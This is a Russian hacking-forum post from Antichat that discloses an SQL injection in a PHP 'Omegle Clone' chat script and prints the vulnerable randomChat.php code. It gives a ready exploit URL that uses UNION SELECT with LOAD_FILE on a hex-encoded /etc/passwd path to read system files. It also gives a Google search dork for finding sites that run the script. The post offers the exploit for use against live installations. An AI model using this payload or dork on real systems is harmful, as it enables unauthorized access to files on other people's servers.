ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Чаты
Перезагрузить страницу Omegle Clone SQL-INJ
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Omegle Clone SQL-INJ
  #1  
Старый 30.01.2010, 06:45
Аватар для BlackSun
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию Omegle Clone SQL-INJ
Версия, производитель, офф сайт и прочее не известно. Выкладываю только из за распространенности.
Зависимости: FILE_PRIV = Y, без них пользы от скули 0.

Уязвимый файл: randomChat.php и еще штук 5, все указывать нет смысла.
Уязвимый кусок кода:
PHP код:
// целиком
<?php
/* ###########################################################
 * File brought to you by kkz
 * There are big ships
 * There are small ships
 * but the best ship
 * is friendship!
 * Sharing is caring... please pass this along but leave this
  ##############################################################*/
$userId=$_REQUEST["userId"];

include('config.inc.php');
include('database.inc.php');
$randomUserId=0;

$result      =mysql_query("SELECT * FROM chats WHERE userId = $userId ");

while ($row=mysql_fetch_array($result))
    {
    $randomUserId=$row["randomUserId"];
    }

if ($randomUserId == 0)
    {
    $result=mysql_query("SELECT * FROM users WHERE id <> $userId AND inchat like 'N' ORDER BY RAND() LIMIT 1");

    while ($row=mysql_fetch_array($result))
        {
        $randomUserId=$row["id"];
        }

    if ($randomUserId != 0)
        {
        mysql_query("INSERT INTO chats (userId,randomUserId) values($userId$randomUserId) ");
        mysql_query("INSERT INTO chats (userId,randomUserId) values($randomUserId$userId) ");

        mysql_query("UPDATE users SET inchat='Y' WHERE id = $userId ");
        mysql_query("UPDATE users SET inchat='Y' WHERE id = $randomUserId ");
        }
    }

echo $randomUserId;
mysql_close($con);
?>
Expl: randomChat.php?userId=-1+union+select+0,LOAD_FILE(0x2f6574632f70617373776 4)+AS+randomUserId+from+chats+--+-

Google: intext:"You're now chatting with a random stranger. Say hi!"
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть первая k00p3r Чужие Статьи 1 12.07.2005 08:51
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ